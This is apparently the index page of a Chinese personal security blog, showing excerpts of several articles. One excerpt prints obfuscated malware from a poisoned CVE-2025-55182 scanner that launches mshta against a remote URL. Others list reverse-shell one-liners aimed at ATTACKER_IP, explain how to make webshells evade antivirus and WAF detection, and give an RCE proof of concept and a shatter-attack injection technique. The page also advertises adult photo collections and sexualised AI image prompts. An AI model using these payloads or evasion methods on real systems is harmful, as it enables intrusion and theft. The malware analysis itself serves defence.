网站更新日志,包含杨CC技术录和杨CC资源站
12345杨CC技术录和资源站更新## ycc77.com (杨CC技术录)## ycc77.cn(杨CC资源站) 2025.12.15ycc77.com (杨CC技术录) 新增了聊一聊一句话木马的免杀方式-包含jsp-python-php-asp 新增:Lingjing—反编译报告 ycc77.cn(杨CC资源站)暂无 2025.12.11ycc77.com (杨CC技术录) 更新了QQ二群无法显示logo问题 ycc77.cn(杨CC资源站) 由于本次更新范围太多,所以这里之写了部分 添加了 一级分类 和 二级分类 查看简介的功能,(鼠标放上0.3秒即可显示) 删除了[单手资源]中的福利合集,但同时添加了: 舞蹈生写真/梨霜儿/秀人网唐安琪写真大合集/福利图20251127/丝足博主[有你喵]视图合集. 删除了 一级分类 乐器&乐器学习和学业资料. 一级分类[其他学习资源] 更名为: [其他学习资源] 二级分类 创业学习资源 更名为: 创业学习 添加了: 自我提升/名著讲解/人生智慧...
Lingjing—反编译报告
杨CC有话说 这是最近很火Lingjing靶场,我发现近期有人说LingJing靶场存在后门,于是今天我对其进行了反编译,顺带出其报告。 因为反编译的代码不全,所以还会重新出具一个安全检测后的报告。今天则只出一个简化版反编译报告。 原始报告和反编译后的源码,由安全考虑,均不提供下载链接。 LingJing Windows EXE 反编译检测报告报告信息 项目 内容 报告名称 LingJing Windows EXE 反编译安全检测报告 检测对象 LingJing.exe 检测日期 2025年12月15日 检测方法 静态分析、反编译分析、字符串分析、安全扫描 检测工具 UPX、redress、Go工具链、strings、grep 报告出具人 疯狂的杨CC 1. 执行摘要本次检测对LingJing.exe文件进行了全面的反编译和安全分析。通过静态分析、反编译源码提取、字符串扫描等多种方法,对二进制文件进行了深入检查。 主要发现: 文件为UPX压缩的Go语言编译的Windows 64位GUI程序 成功反编译提取了928个函数信息和完整的包结构 未发...
聊一聊一句话木马的免杀方式-包含jsp-python-php-asp等
杨CC有话说 一句话木马,其实对于渗透师傅来说,是一些比较常用的一个玩意,而且最近有一部分人想学习一下免杀思路,于是呢,我就整理了一下常见的一句话免杀思路,分享出来,让大家参考以及学习. 免杀思路来源于以往的学习,且本人只是爱好,为非专业人士,如有错误,请大家指正. 本文提供的一句话免杀思路和免杀文件,不允许用于非法用途!!!不允许用于非法用途!!!不允许用于非法用途!!!,只能用于个人测试使用! 文章作者不做任何保证,也不承担任何法律责任! 本文禁止商业使用,禁止非法用途,转载请注明出处! 最后:本文提供从浅到深的一句话免杀思路和示例,示例仅限于展示对应代码,并且包含了可以对抗 EDR/WAF的免杀效果,但由于个人能力有限,不保证正常使用. 还有:由于个人免杀技术有限,不能保证时效性,各位看一下逻辑即可。 前置声明 仅可用于 已授权的渗透测试、企业攻防演练,严禁用于非法入侵他人系统,违反《网络安全法》《刑法》将由使用者承担法律责任;文章作者不承担任何法律责任!!!! 一句话木马免杀核心逻辑与实际操作方案理论. 一句话木马(WebShell)的免杀核心是 规避静态特征检测(如...
解读一下CVE-2025-55182 漏洞扫描器中的恶意代码.
杨CC有话说 这篇文章介绍了一个被恶意投毒的扫描工具-react2shell项目链接:https://github.com/niha0wa/React2shell-scanner这款工具最开始,是我在互联网寻找渗透工具的时候,无意间在群里看到有人讨论这款工具被投毒,于是,我找到了这款工具,并进行分析.最后发现真的有毒….最后,我就出了这个文章,顺便分析一下这个工具嵌入的恶意代码.)文章来源:杨CC技术录 发现的恶意代码展示: 1234567891011def _initialize_runtime_environment(): import subprocess as _sp _exec_path = bytes.fromhex('6d73687461').decode('utf-8') + bytes.fromhex('2e657865').decode('utf-8') _remote_endpoint = bytes.fromhex('68747470733a2f2...
常见的42种反弹shell方式
杨CC有话说 文章来源于公众号:泷羽Sec如有侵权请联系删除 常见的42种反弹shell方式前言 这一篇主要介绍常用的反弹shell的命令 在平时获取到命令执行执行权限的时候,通常都需要使用反弹shell来获取一个稳定的shell,从而绕过防火墙等安全机制的限制 另外反弹过来的shell有一个优点,就是通过/bin/bash或者python3 -c 'import pty;pty.spawn("/bin/bash")'或者其他命令来创建交互式 shell,从而能够执行像su命令切换用户,添加用户相关的命令,它会让你输入相关的信息,这个输入的过程是普通的shell所做不到的,例如: 那么接下来就看看反弹shell的方式有哪些 注意:ATTACKER_IP代表你需要将一个shell反弹到的地址,port代表反弹shell的端口 基于Bash/Terminal的反弹1234567891011121314151617# 2.1 经典TCP反弹bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>...
OSCP2024-记录一下OSCP学习的过程
杨CC有话说 文章来源于:https://github.com/TopRedTeam/OSCP2024/releases .如需完整教材或者资料,可以在上方github中寻找,或者访问杨CC资源站,请在[计算机资源学习] - [渗透学习-书籍] 中寻找,或者直接在杨CC资源站中搜索:OSCP-2024 即可.如有侵权,请联系本人删除 OSCP2024记录一下OSCP学习的过程,请各位师傅监督指正 学习方式:主要记录干货(教材里一堆废话) 学习计划: 1-过教材:教材一共24章节,前五章基本都是废话,从第6章开始整理记录,计划每天能过完一个章节 2-打靶机:免费的Vulnhub靶机,把与OSCP类似的靶机打完 3-官方lab:报名打官方lab(毕竟价格不低,如果没钱就先不报了) 本篇对应教材第六章,主要分两部分”被动信息收集”和”主动信息收集”,记录使用工具和命令 6.2 被动信息收集6.2.1 whois枚举查域名(-h后面是whois服务器) 1whois megacorpone.com -h 192.168.50.251 查IP 1whois 38.100.193.70...
CVE-2025-55182-详情和POC
1. 杨CC有话说 文章来源于:互联网,并且此文章为多个文章整合,收其精华,去其糟粕,取其真理,去其谬误,取其善良.如有侵权,请联系本人删除 2. 详情和POCCVE-2025-55182此漏洞允许在 React Server Functions 中实现远程代码执行(RCE),例如通过不安全的原型引用在 Next.js 中提供的功能。 我不是 React 或 Next.js 的专家,所以请对这里的信息持保留态度。此外,我仍在分析过程中,所以下面描述的”漏洞”可能只是整个攻击链的一小部分。 背景React 提供了 Server Functions^1,可以看作是一种基于 HTTP 的 RPC(远程过程调用)。它们可以用于从相邻节点获取数据以确保低延迟,或执行客户端缺乏凭据的身份验证请求。 React 使用称为 React Flight Protocol^2 的协议来序列化传递给 Server Functions 的值。 客户端将”块”传递给服务器,例如通过表单数据: 12345files = { "0": (None, '["...
破碎注入-无痕注入不使用任何进程句柄的注入技术原理分析
1. 杨CC有话说 无痕注入,不使用任何进程句柄的注入技术原理分析。文章来源: 冲鸭安全 2. 无痕注入-不使用任何进程句柄的注入技术原理分析破碎攻击(Shatter Attack)概念来源 所谓 Shatter Attack 是一种早期(主要在 Windows NT、Windows 2000、Windows XP 时代被关注)的本地特权提升攻击方式。它利用的是 Windows 消息机制(Windows Messages)在同一桌面(desktop)环境下没有足够的安全隔离这一漏洞。 Windows 消息机制的背景 在 Windows 图形界面系统里,GUI 线程之间可以通过 SendMessage / PostMessage 等 API 发送消息。 这些消息(WM_XXX)会被目标窗口的回调过程(WindowProc 或过程函数)处理。 在设计上,所有同一交互会话中的应用程序都可以给彼此发送消息——包括输入消息、控制消息、甚至某些带有内存指针的结构(如 WM_TIMER、WM_COPYDATA、WM_SETTEXT)。如果目标进程是一个高权限进程(例如以管...
免费且强大的终端AI(无需付费-无需设置api的key)-可编程-可渗透-可帮你做很多事情-教程
1. 杨CC有话说 一个非常强大的终端AI,可编程-可渗透-可帮你做很多事情。这是阿里旗下的AI插件,非常强.支持: 自动注入\出报告\任意文件读取\读取密码文件\上传shell\伪造\跨站\任意命令执行\自动使用sqlmap进行sql注入\端口扫描\指纹扫描…等,非常多.但是需要注意,终端AI,调用的所有工具都是本地的工具.需要本地存在这些工具才能使用…. 2. 安装&使用2.1 注册 点击注册 点击后,会跳转到网页,然后使用手机号注册即可. 注册登录成功后,我们就准备安装 2.2 安装注意事项: 目前终端AI,仅支持在linux下使用. 安装 打开自己的终端,复制下面的代码,然后粘贴到终端中,回车即可. 1bash -c "$(curl -fsSL https://gitee.com/iflow-ai/iflow-cli/raw/main/install.sh)" 注意:如果你想要让它帮你进行渗透,我们则需要在kali或者parrot中进行安装. 注意2: 如果你是在本机安装,不要使用yolo权限,不要使用root权限. 安装完成后,我们...
各大AI焚决
1. 杨CC有话说 长话短说,这里有各大AI的焚决,足以让你的AI更加强大。 2. AI焚决2.1 多数通用焚决2.1.1 图片-樱花树下你和我~ 参考图 焚决 123帮我生成图片:图中人物的剪影,保持头饰与发型服装不变,倚靠在一颗巨大的樱花树下,右手持一朵玫瑰,低头闻着玫瑰花香,电影级光影效果,逆光,人物剪影。黄昏。场景中有些许零散的粉色花瓣飘落,浪漫氛围,极致细节。比例9:16。原比例。 详情截图 2.1.2 图片- 佛光谱照 参考图 焚决 12帮我生成图片:图中人物的剪影,保持头饰与发型服装不变,倚靠在一颗巨大佛祖下,脸部面貌清晰可见,右手持一把佛仗,电影级光影效果,逆光,人物剪影。金昏。场景中有大量佛教符号在空中漂浮,唯浪漫氛围,极致细节比例 3:4。 详情截图 2.1.3 图片 - 学生、宿舍、半裸、C 参考图 焚决 1Mobile phone shot, an Asian woman aged 18-22, with short black hair and small braids, should have a C-cup bra on her c...


